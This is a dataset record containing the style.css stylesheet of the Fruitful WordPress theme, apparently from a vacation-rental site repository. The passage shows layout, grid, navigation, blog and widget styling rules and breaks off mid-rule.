path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
wp-content/themes/fruitful/style.css
BlueSkyVacations-Pantheon/BlueSkyVacations-Pantheon
/* Theme Name: Fruitful Theme URI: https://github.com/fruitfulcode/fruitful Author: fruitfulcode Author URI: https://github.com/fruitfulcode/ Description: Fruitful - Free WordPress responsive theme with powerful theme options panel and simple clean front end design. Ability to modify styles and options according to your needs. Two different layout types responsive and fixed. Easily upload logo, background, edit colors, header and menu positions, slider, fonts, social icons, footer, custom css and much more. Translated to Russian, German, Spanish, French, Vietnamese, RTL ready. Works perfect with WooCommerce, BuddyPress, WPML, Contact form 7. Version: 3.3.1 License: GNU General Public License v2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html Tags: white, orange, light, theme-options, responsive-layout, fixed-layout, custom-header, custom-background, custom-menu, custom-colors, custom-background, translation-ready, featured-images, full-width-template, one-column, right-sidebar, left-sidebar, editor-style Text Domain: fruitful This theme, like WordPress, is licensed under the GPL. Use it to make something cool, have fun, and share what you've learned with others. */ html, body, div, span, applet, object, iframe,h1, h2, h3, h4, h5, h6, p, blockquote, pre,a, abbr, acronym, address, big, cite, code,del, dfn, em, font, ins, kbd, q, s, samp,small, strike, strong, sub, sup, tt, var,dl, dt, dd, ol, ul, li,fieldset, form, label, legend,table, caption, tbody, tfoot, thead, tr, th, td { border:0; font-family:inherit; font-size:100%; font-style:inherit; font-weight:inherit; margin:0; outline:0; padding:0; vertical-align:baseline; } html { font-size:62.5%; ms-text-size-adjust:100%; overflow:auto; webkit-text-size-adjust:100%; } body { min-width:300px; background:none no-repeat scroll 0 0 #fff; font-size:14px; line-height:14px; text-rendering:optimizelegibility; color:#333333; overflow:hidden; font-family: Open Sans, Helvetica, Arial, sans-serif; } .ng-invalid.ng-dirty { border-color: red; } .ng-valid.ng-dirty { border-color: green; } .page-container{ padding-top:10px; margin-bottom:10px; margin-top: 101px; } /* jQuery Property Accordion */ #frame { width: 540px; } .accord { width: 800px; border-bottom: solid 1px #1F0429; } .accord h3 { background: #e9e7e7 url(graphic/arrow-square.gif) no-repeat right -51px; padding: 7px 15px; margin: 0; font: bold 120%/100% Arial, Helvetica, sans-serif; border: solid 1px #1F0429; cursor: pointer; text-align: center; } .accord h3:hover { background-color: #E1B4F0; } .accord h3.active { background-position: right 5px; } .accord ul { background: #f7f7f7; margin: 0; padding: 10px 10px 15px 20px; border-left: solid 1px #1F0429; border-right: solid 1px #1F0429; border-bottom: solid .5px #1F0429; display: none; } /* Contact Expand */ .expand { width: 15%; height: 15%; margin: 0 10px; border: 1px blue solid; -webkit-transition: width 2s ease, height 2s ease; -moz-transition: width 2s ease, height 2s ease; -o-transition: width 2s ease, height 2s ease; transition: width 2s ease, height 2s ease; } .expand-change { width: 60%; height: 60%; margin: 25px; border: 1px purple solid; -webkit-transition: width .5s ease, height 1s ease; -moz-transition: width 1s ease, height 1s ease; -o-transition: width 1s ease, height 1s ease; transition: width 1s ease, height 1s ease; -webkit-box-shadow: 14px 18px 52px -1px rgba(23,36,69,1); -moz-box-shadow: 14px 18px 52px -1px rgba(23,36,69,1); box-shadow: 14px 18px 52px -1px rgba(23,36,69,1); } /*Fix fancybox 2*/ body.fancybox-lock { overflow:visible !important; margin-right:auto !important; } .container { position:relative; width:960px; margin:0 auto; padding:0; } .container .column, .container .columns { float:left; display:inline; margin-left:10px; margin-right:10px; } .row { margin-bottom:20px; } /* Nested Column Classes */ .column.alpha, .columns.alpha { margin-left:0; float:left; } .column.omega, .columns.omega { margin-right:0; float:right; } /* Base Grid */ .container .one.column,.container .one.columns { width:40px; } .container .two.columns { width:100px; } .container .three.columns { width:160px; } .container .four.columns { width:220px; } .container .five.columns { width:280px; } .container .six.columns { width:340px; } .container .seven.columns { width:400px; } .container .eight.columns { width:460px; } .container .nine.columns { width:520px; } .container .ten.columns { width:580px; } .container .eleven.columns { width:640px; } .container .twelve.columns { width:700px; } .container .thirteen.columns { width:760px; } .container .fourteen.columns { width:820px; } .container .fifteen.columns { width:880px; } .container .sixteen.columns { width:940px; } .container .one-third.column { width:300px; } .container .two-thirds.column { width:620px; } /* Offsets */ .container .offset-by-one { padding-left:60px; } .container .offset-by-two { padding-left:120px; } .container .offset-by-three { padding-left:180px; } .container .offset-by-four { padding-left:240px; } .container .offset-by-five { padding-left:300px; } .container .offset-by-six { padding-left:360px; } .container .offset-by-seven { padding-left:420px; } .container .offset-by-eight { padding-left:480px; } .container .offset-by-nine { padding-left:540px; } .container .offset-by-ten { padding-left:600px; } .container .offset-by-eleven { padding-left:660px; } .container .offset-by-twelve { padding-left:720px; } .container .offset-by-thirteen { padding-left:780px; } .container .offset-by-fourteen { padding-left:840px; } .container .offset-by-fifteen { padding-left:900px; } /* #Tablet (Portrait)================================================== */ /* Note:Design for a width of 768px */ @media only screen and (min-width:768px) and (max-width:959px) { .container { width:768px; } .container .column,.container .columns { margin-left:10px; margin-right:10px; } .column.alpha,.columns.alpha { margin-left:0; margin-right:10px; } .column.omega,.columns.omega { margin-right:0; margin-left:10px; } .alpha.omega { margin-left:0; margin-right:0; } .container .one.column,.container .one.columns { width:28px; } .container .two.columns { width:76px; } .container .three.columns { width:124px; } .container .four.columns { width:172px; } .container .five.columns { width:220px; } .container .six.columns { width:268px; } .container .seven.columns { width:316px; } .container .eight.columns { width:364px; } .container .nine.columns { width:412px; } .container .ten.columns { width:460px; } .container .eleven.columns { width:508px; } .container .twelve.columns { width:556px; } .container .thirteen.columns { width:604px; } .container .fourteen.columns { width:652px; } .container .fifteen.columns { width:700px; } .container .sixteen.columns { width:748px; } .container .one-third.column { width:236px; } .container .two-thirds.column { width:492px; } /* Offsets */ .container .offset-by-one { padding-left:48px; } .container .offset-by-two { padding-left:96px; } .container .offset-by-three { padding-left:144px; } .container .offset-by-four { padding-left:192px; } .container .offset-by-five { padding-left:240px; } .container .offset-by-six { padding-left:288px; } .container .offset-by-seven { padding-left:336px; } .container .offset-by-eight { padding-left:384px; } .container .offset-by-nine { padding-left:432px; } .container .offset-by-ten { padding-left:480px; } .container .offset-by-eleven { padding-left:528px; } .container .offset-by-twelve { padding-left:576px; } .container .offset-by-thirteen { padding-left:624px; } .container .offset-by-fourteen { padding-left:672px; } .container .offset-by-fifteen { padding-left:720px; } } /* #Mobile (Portrait)================================================== */ /* Note:Design for a width of 320px */ @media only screen and (max-width:767px) { .container { width:300px; } .container .columns,.container .column { margin:0; } .container .one.column,.container .one.columns,.container .two.columns,.container .three.columns,.container .four.columns,.container .five.columns,.container .six.columns,.container .seven.columns,.container .eight.columns,.container .nine.columns,.container .ten.columns,.container .eleven.columns,.container .twelve.columns,.container .thirteen.columns,.container .fourteen.columns,.container .fifteen.columns,.container .sixteen.columns,.container .one-third.column,.container .two-thirds.column { width:300px; } /* Offsets */ .container .offset-by-one,.container .offset-by-two,.container .offset-by-three,.container .offset-by-four,.container .offset-by-five,.container .offset-by-six,.container .offset-by-seven,.container .offset-by-eight,.container .offset-by-nine,.container .offset-by-ten,.container .offset-by-eleven,.container .offset-by-twelve,.container .offset-by-thirteen,.container .offset-by-fourteen,.container .offset-by-fifteen { padding-left:0; } } /* #Mobile (Landscape)================================================== */ /* Note:Design for a width of 480px */ @media only screen and (min-width:480px) and (max-width:767px) { .container { width:420px; } .container .columns,.container .column { margin:0; } .container .one.column,.container .one.columns,.container .two.columns,.container .three.columns,.container .four.columns,.container .five.columns,.container .six.columns,.container .seven.columns,.container .eight.columns,.container .nine.columns,.container .ten.columns,.container .eleven.columns,.container .twelve.columns,.container .thirteen.columns,.container .fourteen.columns,.container .fifteen.columns,.container .sixteen.columns,.container .one-third.column,.container .two-thirds.column { width:100%; max-width:420px; } } /* #Clearing================================================== */ /* Self Clearing Goodness */ .container:after { content:""; display:block; height:0; clear:both; visibility:hidden; } /* Use clearfix class on parent to clear nested columns, or wrap each row of columns in a <div class="row"> */ .clearfix:before,.clearfix:after,.row:before,.row:after { content:''; display:block; overflow:hidden; visibility:hidden; width:0; height:0; } .row:after,.clearfix:after { clear:both; } .row,.clearfix { zoom:1; } .container.after-head-container { overflow:hidden } /* You can also use a <br class="clear" /> to clear columns */ .clear { clear:both; display:block; overflow:hidden; visibility:hidden; width:0; height:0; } article,aside,details,figcaption,figure,footer,header,nav,section { display:block; } ol, ul { list-style:none; } table { border-collapse:separate; border-spacing:0; } caption, th, td { font-weight:normal; text-align:left; } blockquote:before, blockquote:after, q:before, q:after { content:""; } blockquote, q { quotes:"" ""; } a:hover, a:active { outline:0; } img.size-full{ width:100%; height:auto; } .entry-content img, .entry-summary img, .comment-content img, .widget img, .wp-caption { max-width: 100%; } a img, img { border:0; } body,button,input,select,textarea { font-size:14px; line-height:1.5; font-weight:normal; } textarea{ max-width:100%; } h1,h2,h3,h4,h5,h6 { clear:both; line-height:1.2em; } h1 { font-size: 27px;} h2 { font-size: 34px;} h3 { font-size: 18px;} h4 { font-size: 17px;} h5 { font-size: 14px;} h6 { font-size: 12px;} .entry-content h1, .entry-content h2, .entry-content h3, .entry-content h4, .entry-content h5, .entry-content h6, .comment-content h1, .comment-content h2, .comment-content h3, .comment-content h4, .comment-content h5, .comment-content h6{ margin:10px 0; line-height:28px } hr { background-color:#ccc; border:0; height:1px; margin-bottom:1.5em; } p { margin: 1em 0 1em 0; } ul, ol { margin:0 0 1.5em 3em; } ul { list-style:disc; } ol { list-style:decimal; } ul ul, ol ol, ul ol, ol ul { margin-bottom:0; margin-left:1.5em; } dt { font-weight:bold; } dd { margin:0 1.5em 1.5em; } b, strong { font-weight:bold; } dfn, cite, em, i { font-style:italic; } blockquote { margin:0 1.5em; } address { margin:0 0 1.5em; } pre { background:#eee; font-family:"Courier 10 Pitch", Courier, monospace; font-size:1.5em; font-size:15px; line-height:1.6; margin-bottom:1.6em; max-width:100%; overflow:auto; padding:1.6em; } code, kbd, tt, var { font:15px Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; } abbr, acronym { border-bottom:1px dotted #666; cursor:help; } mark, ins { background:#fff9c0; text-decoration:none; } sup,sub { font-size:75%; height:0; line-height:0; position:relative; vertical-align:baseline; } sup { bottom:1ex; } sub { top:.5ex; } small { font-size:75%; } big { font-size:125%; } figure { margin:0; } fieldset { border: 1px solid #c0c0c0; margin: 0 2px; padding: 0.35em 0.625em 0.75em; } legend { border: 0; padding: 0; white-space: normal; } table { margin:0 0 1.5em; width:100%; } th { text-transform:uppercase; } button,input,select,textarea { font-size:100%; margin:0; vertical-align:baseline; vertical-align:middle; } button, input { line-height:normal; overflow:visible; } button,html input[type="button"],input[type="reset"],input[type="submit"] { background:#f15a23; border:none; font-family:"Open Sans"; color: #fff; text-transform:uppercase; cursor:pointer; font-size:1.4rem; font-size:14px; /* padding:0.62em .7em .5em; */ padding: 10px 18px ; /* webkit-appearance:button; */ -webkit-appearance: none; -webkit-transition: background 0.2s ease-in-out; -moz-transition: background 0.2s ease-in-out; -khtml-transition: background 0.2s ease-in-out; -o-transition: background 0.2s ease-in-out; -ms-transition: background 0.2s ease-in-out; transition: background 0.2s ease-in-out; line-height:100%; } @-moz-document url-prefix() { .page #comments #respond input[type="submit"]{ padding: 7px 18px !important; } } #comments{ width:100%; float:left } #page #comments #commentform input[type="submit"] { max-height:none; margin-bottom: 10px; } .single-post #comments #respond input[type="submit"]{ line-height:12px; } button:hover,html input[type="button"]:hover,input[type="reset"]:hover,input[type="submit"]:hover { background:#fe4502; } button:focus,html input[type="button"]:focus,input[type="reset"]:focus,input[type="submit"]:focus,button:active,html input[type="button"]:active,input[type="reset"]:active,input[type="submit"]:active { background:#fe4502; } input[type="checkbox"],input[type="radio"] { box-sizing:border-box; padding:0; } input[type="search"] { box-sizing:content-box; moz-box-sizing:content-box; webkit-appearance:textfield; webkit-box-sizing:content-box; } input[type="search"]::-webkit-search-decoration { webkit-appearance:none; } button::-moz-focus-inner,input::-moz-focus-inner { border:0; padding:0; } input[type=text],input[type=email],input[type=url],textarea,input[type=tel],textarea,input[type=number],input[type=date], select { border:1px solid #e5e5e5; border-radius:3px; color:#45494c; } input[type=text]:focus,input[type=email]:focus,textarea:focus,input[type=tel]:focus,input[type=number]:focus,input[type=date]:focus { color:#111; } input[type=text],input[type=email],input[type=url],input[type=tel],input[type=number],input[type=date] { padding:3px; } textarea { overflow:auto; padding-left:3px; vertical-align:top; width:98%; } .wpcf7-list-item.first { margin:0; } div.wpcf7-response-output { margin: 2em 0em 1em; } a { color:#333333; } a:hover,a:focus,a:active { color:#FF5D2A; } #commentform label { width: 125px; float: left; } #commentform p{ margin:0 0 1em; } #commentform p.form-submit{ margin:0; } #commentform p.comment-subscription-form label { width: initial; float: none; } #commentform p.comment-form-rating{ display: inline-block; margin: 10px 0; } .form-allowed-tags{ display:none } .alignleft { display:inline; float:left; margin-right:1.5em; } .alignright { display:inline; float:right; margin-left:1.5em; } .aligncenter { clear:both; display:block; margin:0 auto; } .assistive-text { clip:rect(1px 1px 1px 1px); clip:rect(1px, 1px, 1px, 1px); position:absolute !important; } #header_language_select{ float:right; height:100%; margin: 10px 0 0; padding:0; z-index:8002; clear:both; } #header_language_select ul{ margin:0; list-style:none; } #header_language_select ul li.current{ position: relative; } #lang-select-block a{ display:block; color:#333333; text-decoration:none; text-transform:uppercase; padding:7px 20px; font-size:14px; } #lang-select-block .current a{ -webkit-transition: all 0.3s ease-in-out; -moz-transition: all 0.3s ease-in-out; -khtml-transition: all 0.3s ease-in-out; -o-transition: all 0.3s ease-in-out; -ms-transition: all 0.3s ease-in-out; transition: all 0.3s ease-in-out; } #lang-select-block li.current:hover>a{ background:#F15A23; color:#ffffff; } ul#lang-select-popup{ box-shadow:0 3px 3px rgba(0,0,0,0.2); background:#fff; display:block; float:left; left:-26px; moz-box-shadow:0 3px 3px rgba(0,0,0,0.2); webkit-box-shadow:0 3px 3px rgba(0,0,0,0.2); position:absolute; top:35px; -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -khtml-transition: all 0.2s ease-in-out; -o-transition: all 0.2s ease-in-out; -ms-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; opacity:0; margin:20px 0 0 0; _margin: 0; /*IE6 only*/ visibility:hidden; z-index:8001; } #header_language_select ul li:hover > ul { margin: 0; opacity: 1; visibility: visible; } #lang-select-popup a { padding: 12px 15px; text-transform: none; } .main-navigation { display:block; float:left; margin:10px 0 0 0; position:relative; } .main-navigation ul { list-style:none; margin:0; padding-left:0; } .main-navigation li:first-child { margin:0; } .main-navigation li { margin:0 0 0 10px; } .main-navigation li { float:left; position:relative; } .main-navigation a { display:block; text-decoration:none; /*color:#333333;*/ text-transform:uppercase; padding:7px 10px; font-size:14px; } .main-navigation ul ul { box-shadow:0 3px 3px rgba(0,0,0,0.2); display:block; float:left; left:0; moz-box-shadow:0 3px 3px rgba(0,0,0,0.2); webkit-box-shadow:0 3px 3px rgba(0,0,0,0.2); background:none #fff; position:absolute; top:35px; z-index:8000; -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -khtml-transition: all 0.2s ease-in-out; -o-transition: all 0.2s ease-in-out; -ms-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; opacity:1; margin:20px 0 0 0; _margin: 0; /*IE6 only*/ visibility:hidden; } .main-navigation ul ul ul { left:100%; top:0; margin:0 0 0 20px; } .main-navigation ul ul a { min-width:155px; background:none ; padding:12px 15px !important; color:#333333; text-transform:none; font-size:14px; box-shadow:none !important; transition:background 0 linear !important; } .main-navigation ul ul li:first-child { background:none; } .main-navigation ul ul li { float:left; width:100%; margin:0 !important } .main-navigation ul li:hover > a { background:none repeat scroll 0 0 #F15A23; color:#fff; padding:7px 10px; -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.3s ease-in-out; -khtml-transition: all 0.3s ease-in-out; -o-transition: all 0.3s ease-in-out; -ms-transition: all 0.3s ease-in-out; transition: all 0.3s ease-in-out; font-size:14px; } .main-navigation ul ul:hover > a { color:#333 !important; text-shadow:none !important; } .main-navigation ul ul a:hover, .main-navigation ul ul li.current_page_item a, .main-navigation ul ul li.current-menu-item a, .main-navigation ul ul li.current-menu-parent a, .main-navigation ul ul li.current-menu-ancestor a { color:#333; text-shadow:none !important; } .main-navigation ul li:hover > ul { margin:0; opacity:1; visibility:visible; } .main-navigation ul li.current_page_item a, .main-navigation ul li.current-menu-item a, .main-navigation ul li.current-menu-parent a, .main-navigation ul li.current_page_parent a, .main-navigation ul li.current-menu-ancestor a { background:none repeat scroll 0 0 #F15A23; color:#fff; padding:7px 10px; } .menu-toggle { cursor:pointer; } .main-small-navigation .menu { display:none; } #masthead, #colophon, #content { float:left; width:100%; margin:10px 0; min-height:60px; } .archive #content { margin:0 0 10px 0; } #colophon{ position:relative; margin:0; padding:0; border-top:1px solid #d6d6d6; background: #4eb3df; } #colophon>.container{ margin:0 auto; padding:20px 0; position: relative; } #colophon .site-info { font-size:12px; float:left; width:420px; padding:8px 0; } #masthead .social-icon{ float:right; width: 100%; margin-bottom: 10px; } #colophon .social-icon { float:right } #masthead .social-icon a, #colophon .social-icon a{ width:30px; height:30px; opacity:1; /* background-image:url(images/social.png); */ background-repeat:no-repeat; } #masthead .social-icon a{ float:right; } #colophon .social-icon a { float:left; } #masthead .social-icon a.myspace, #masthead .social-icon a.yelp, #colophon .social-icon a.myspace, #colophon .social-icon a.yelp { background-image:url(images/social.png); } #masthead .social-icon a:hover, #masthead .social-icon a:active, #colophon .social-icon a:hover, #colophon .social-icon a:active { opacity:0.9 } #masthead .social-icon a.myspace, #colophon .social-icon a.myspace { background-position:-31px 0; } #masthead .social-icon a.yelp, #colophon .social-icon a.yelp { background-position:-435px 0; } .social-icon>a>i{color:#fff;background: #333333; border-radius: 50%; padding: 5.5px; margin:1px; width: 17px; height: 17px; text-align: center; font-size: 17px;} .social-icon a>.fa:before{font-size:17px;} .social-icon a.soundcloud >i, .social-icon a.tripadvisor>i {padding:5.5px 0;width:28px;} .social-icon a.facebook .fa:before {content: "\f09a";} .social-icon a.twitter .fa:before {content: "\f099";} .social-icon a.linkedin .fa:before {content: "\f0e1";} .social-icon a.googleplus .fa:before {content: "\f0d5";} .social-icon a.dribbble .fa:before {content: "\f17d";} .social-icon a.skype .fa:before {content: "\f17e";} .social-icon a.flickr .fa:before {content: "\f16e";} .social-icon a.youtube .fa:before {content: "\f167";} .social-icon a.vimeo .fa:before {content: "\f194";} .social-icon a.rss .fa:before {content: "\f09e";} .social-icon a.vk .fa:before {content: "\f189";} .social-icon a.pinterest .fa:before {content: "\f0d2";} .social-icon a.instagram .fa:before {content: "\f16d";} .social-icon a.email .fa:before {content: "\f0e0";} .social-icon a.github .fa:before {content: "\f09b";} .social-icon a.tumblr .fa:before {content: "\f173";} .social-icon a.soundcloud .fa:before {content: "\f1be";} .social-icon a.tripadvisor .fa:before{content: "\f262";} /* #masthead .social-icon a.twitter, #colophon .social-icon a.twitter { background-position:-280px 0; } #masthead .social-icon a.linkedin, #colophon .social-icon a.linkedin { background-position:-93px 0; } #masthead .social-icon a.myspace, #colophon .social-icon a.myspace { background-position:-31px 0; } #masthead .social-icon a.googleplus, #colophon .social-icon a.googleplus { background-position:-62px 0; } #masthead .social-icon a.dribbble, #colophon .social-icon a.dribbble { background-position:0 0; } #masthead .social-icon a.skype, #colophon .social-icon a.skype { background-position:-125px 0; } #masthead .social-icon a.flickr, #colophon .social-icon a.flickr { background-position:-187px 0; } #masthead .social-icon a.youtube, #colophon .social-icon a.youtube { background-position:-218px 0; } #masthead .social-icon a.rss, #colophon .social-icon a.rss { background-position:-155px 0; } #masthead .social-icon a.vk, #colophon .social-icon a.vk { background-position:-311px 0; } #masthead .social-icon a.pinterest, #colophon .social-icon a.pinterest { background-position:-373px 0; } #masthead .social-icon a.instagram, #colophon .social-icon a.instagram { background-position:-404px 0; } #masthead .social-icon a.yelp, #colophon .social-icon a.yelp { background-position:-435px 0; } #masthead .social-icon a.email, #colophon .social-icon a.email { background-position:-342px 0; } */ .sticky {} .hentry { margin:0 0 1.5em; } .entry-meta { clear:both; } .byline { display:none; } .single .byline,.group-blog .byline { display:inline; } .entry-content,.entry-summary { margin:1.5em 0 0; } .page-links { clear:both; margin:0 0 1.5em; } .blog .format-aside .entry-title,.archive .format-aside .entry-title { display:none; } .site-header img,.comment-content img,.widget img { max-width:100%; } .site-header img,.entry-content img,img[class*="align"],img[class*="wp-image-"] { height:auto; } img.size-full { width:auto !important; max-width: 100%; } .entry-content img.wp-smiley,.comment-content img.wp-smiley { border:none; margin-bottom:0; margin-top:0; padding:0; } .wp-caption { margin-bottom: 15px; max-width: 100%; } .entry-thumbnail { display: block; float: left; padding:0 4.4%; width: 100%; box-sizing: border-box; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; margin:20px 0 0; height:auto; } .entry-thumbnail .wp-post-image { box-shadow: 0 3px 4px rgba(0, 0, 0, 0.5); height: auto; width: 100%; } .format-audio .wp-audio-shortcode { height: 30px !important; margin: 20px 0; max-width: 450px !important; } .wp-caption.aligncenter,.wp-caption.alignleft,.wp-caption.alignright { margin-bottom:1.5em; margin-bottom:15px; } .wp-caption img { box-shadow: 0 3px 4px rgba(0, 0, 0, 0.5); } .wp-caption-text { text-align:center; } .wp-caption .wp-caption-text { margin:0.8075em 0; } .site-content .gallery a img { border:none; height:auto; max-width:90%; } .site-content .gallery dd { margin:0; } .site-content .gallery-columns-4 .gallery-item { } .site-content .gallery-columns-4 .gallery-item img { } embed,iframe,object { max-width:100%; clear:both; } .site-content .site-navigation { float:left; margin:0 0 1.5em; overflow:hidden; width:100%; } .site-content .nav-previous a, .site-content .nav-next a{ text-decoration:none } .site-content .nav-previous { float:left; width:46%; } .site-content .nav-next { float:right; text-align:right; width:46%; } .bypostauthor {} .widget { margin:0 0 1.5em; } #searchsubmit { display: block; top: 0; right: 0; position: absolute; width: 25px; height: 32px; text-indent: -999px; opacity: 0; } .no-slider-text { text-align:center; } .main-slider-container { margin:10px 0; -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; -webkit-border-radius: 0px; -moz-border-radius: 0px; -ms-border-radius: 0px; -o-border-radius: 0px; border-radius: 0px; background: none; border: none; height: 100%; overflow: hidden; } .main-slider-container .flexslider{ margin:0; } section { overflow: hidden; position: relative; } .main-slider-container.full-width { height: 900px; } .flex-direction-nav a { z-index:999 } #page { position:relative; z-index:1; } #page .container .btm_header, #page .container .entry-header { border:0; margin: 0 0 10px; } .search #page .container .entry-header { border:0; } #page-header .head-container{ z-index:1000; } #page-header .container header .header-hgroup.left-pos { float:left; margin: 0 15px 0 0; } #page-header .container header .header-hgroup.center-pos { float: right; margin:0; width:100%; display:inline-block; text-align:center; } #page-header .container header .header-hgroup.center-pos a { text-align:center; float:none; } #page-header .container header .header-hgroup.right-pos { float:right; margin: 0 0 0 15px; } #page-header .container header .menu-wrapper.left-pos { float:left; display:inline-block; } #page-header .container header .menu-wrapper.center-pos { float:none; display:block; margin:0 auto; display: inherit; max-width: 100%!important; } #page-header .container header .menu-wrapper.center-pos .main-navigation { width: 100%; text-align: center; } #page-header .container header .menu-wrapper.center-pos .main-navigation li { float:none; display: inline-block; } #page-header .container header .menu-wrapper.right-pos { float:right; display:inline-block; } .page-header { margin: 0 0 20px; } #page .container .content p { text-align:justify; } #page .container header.entry-header h1.entry-title, #page .container header.archive-header h1.archive-title { /*font-size:20px;*/ padding:0 0 20px 0 } span.text_orange { color:#ff5d2a } .select-menu { display:none; width:100%; margin:0 0 25px 0; cursor:pointer; padding:6px; background:#f9f9f9; border:1px solid #e3e3e3; color:#777; float:left } header.post-header, .blog_post { float:left; width:100% } .post-content .entry-summary, .post-content .entry-content{clear:both} .blog .blog_post, .category .blog_post, .tag .blog_post, .author .blog_post, .archive .blog_post, .search .blog_post{ margin:0 0 55px } .blog .blog_post:last-of-type, .category .blog_post:last-of-type, .tag .blog_post:last-of-type, .author .blog_post:last-of-type, .search .blog_post:last-of-type{ margin:0 0 35px } .blog_post .date_of_post { position:relative; left:1px; width:54px; height:54px; color:#fff; float:left; margin:0; background: #F15A23; } .blog_post .date_of_post .day_post { font-size:20px; text-align:center; filter:none; float:left; width:100%; font-weight:bold; margin:5px 0 0 0 } .blog_post .date_of_post .month_post { font-size:13px; text-align:center; float:left; width:100%; text-transform:uppercase; line-height:18px; position:relative; top: -6px; } .blog .post-title, .single .post-title{ line-height:24px; } .blog_post .post-content { float:left; width:884px; padding:0 0 18px 0; border:1px solid #d6d6d6 } .eleven.columns .blog_post .post-content { width:584px; } .search .blog_post .post-content{ width:884px; } .blog_post .post-content .entry-content, .blog_post .post-content .entry-summary{ padding:20px 4.4% 10px; margin-top:0 } .blog_post .post-content footer.entry-meta{ margin:0; padding:0 4.4% } .blog_post .post-content footer.entry-meta .comments-link, .blog_post .post-content footer.entry-meta .author-link, .blog_post .post-content footer.entry-meta .cat-links, .blog_post .post-content footer.entry-meta .tag-links { height:22px; width:auto; padding:0 0 2px 26px; margin:0 10px 0 0 } .blog_post .post-content footer.entry-meta .edit-link{ float:right; width:auto; padding:0; margin:0; } .blog_post .post-content footer.entry-meta .comments-link { background:url(images/comment.png) no-repeat 0 0 transparent; } .blog_post .post-content footer.entry-meta .author-link { background:url(images/user.png) no-repeat 0 0 transparent; } .blog_post .post-content footer.entry-meta .cat-links { background:url(images/category.png) no-repeat 0 3px transparent; } .blog_post .post-content footer.entry-meta .tag-links { background:url(images/tag.png) no-repeat 0 3px transparent; } .blog_post .post-content footer.entry-meta .comments-link:hover,.blog_post .post-content footer.entry-meta .author-link:hover,.blog_post .post-content footer.entry-meta .cat-links:hover { opacity:0.9 } .blog_post .post-content footer.entry-meta .comments-link a,.blog_post .post-content footer.entry-meta .tag-links a,.blog_post .post-content footer.entry-meta .author-link a,.blog_post .post-content footer.entry-meta .cat-links a,.blog_post .post-content footer.entry-meta .edit-link a { text-decoration:none; } .more-link { text-decoration:none; font-size:13px } body div.pp_pic_holder{z-index:100000} body div.pp_overlay{background-color:#333333} .screen-reader-text {float:left;padding:8px 15px 8px 0} /* =Custom posts= */ article.post-password-required header.post-header .post-title{ width:85.61%; padding: 0 10% 13px 4.4%; background:url(images/post-password.png) no-repeat 97% 0 transparent; } article.format-link header.post-header .post-title{ width:85.61%; padding: 0 10% 13px 4.4%; background:url(images/post-link.png) no-repeat 97% 0 transparent; } article[class*=tag-twitter] header.post-header .post-title{ width:85.61%; padding: 0 10% 13px 4.4%; background:url(images/post-twitter.png) no-repeat 97% 0 transparent; } article.format-quote header.post-header .post-title{ width:85.61%; padding: 0 10% 13px 4.4%; background:url(images/post-quote.png) no-repeat 97% 0 transparent; } cite{font-weight:bold} cite a{font-weight:bold;text-decoration:none} article.format-image .wp-caption a{ position:relative; display:block; } .single-post article.format-image img{ width: auto; max-width: 100%; box-shadow: 0 3px 4px rgba(0, 0, 0, 0.5); } article.format-image .wp-caption a:after{ position:absolute; display:block; left:0; top:0; width:100%; height:100%; content:" "; background:url(images/image-linked.png) no-repeat center center transparent; } article.format-image .wp-caption a:hover:after{ background:url(images/image-linked-hover.png) no-repeat center center transparent; } .mejs-controls .mejs-time-rail .mejs-time-loaded { background:#fff !important } /* .entry-content iframe{max-height:650px} */ .header-hgroup a.link-logo-retina, .site-header a.link-logo-retina { display:none; } .logo-description { float:left; display:block; word-wrap: break-word; text-decoration:none; margin:5px 0 0 0; /*color:#333333;*/ } .logo-description h1.site-title { font-size:20px !important; font-weight:bold; line-height:20px; /*color:#333333;*/ } .logo-description h2.site-description { font-size:14px !important; /*color:#333333;*/ } header.post-header .post-title { border-bottom: 2px solid #f15a23; float: left; font-size: 27px; margin: 14px 0 0; padding: 0 4.4% 13px; width: 100%; box-sizing: border-box; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; word-wrap: break-word; } header.post-header .post-title a { text-decoration:none; } #page .container #secondary { float:left; width:100%; margin:10px 0 0 0 } #page .container #secondary .widget { float:left; width:100%; } #page .container #secondary .widget h3.widget-title, #page .container #secondary .widget h1.widget-title { border-bottom:2px solid #f15a23; padding:0 0 10px 0; margin:0 0 20px 0 } #page .container #secondary .widget ul { float:left; width:98%; width:calc(100% - 8px); list-style:none; margin:0 0 0 8px } #page .container #secondary .widget a { font-size:13px; text-decoration:none } #page .container #secondary .widget ul li { margin:0 0 10px 0; } #page .container #secondary .widget ul li.cat-item { float:left; width:100%; padding:0; margin:0; } #page .container #secondary .widget ul.children{ padding-left:20px; } #page .container #secondary .widget ul li.cat-item a{ padding:0; margin-bottom:10px; float:left; } #page .container #secondary .widget ul li.cat-item ul li a{ padding:0 0 0 5px; } #page .container #secondary .widget ul li.cat-item ul li a:before{ content: "\f105"; color: #333333; font-family: FontAwesome; margin-right: 6px; font-size: 1em; font-weight: bold; } #page .container #secondary .widget ul li.current-cat a:before, #page .container #secondary .widget ul li.cat-item a:hover:before{ color: #ff5d2a; } #page .container #secondary>.widget_nav_menu a{ float:left; padding:0; margin:0 0 10px 0; } #page .container #secondary>.widget_nav_menu li, #page .container #secondary>.widget_nav_menu li ul li{ float:left; width:100%; margin:0; } #page .container #secondary>.widget_nav_menu>div ul>li{ width:100%; margin:0; } #page .container #secondary>.widget_nav_menu>div>ul li>ul{ margin-left:20px; width:calc(100% - 15px); } #page .container #secondary>.widget_nav_menu>div>ul>li ul>li>a{ padding-left:5px; } #page .container #secondary>.widget_nav_menu>div>ul>li ul>li>a:before{ content: "\f105"; color: #333333; font-family: FontAwesome; margin-right: 6px; font-size: 1em; font-weight: bold; } #page .container #secondary>.widget_nav_menu>div>ul>li ul>li>a:hover:before, #page .container #secondary>.widget_nav_menu>div>ul>li ul>li.current-menu-item>a:hover:before{ color: #ff5d2a; } #page .container 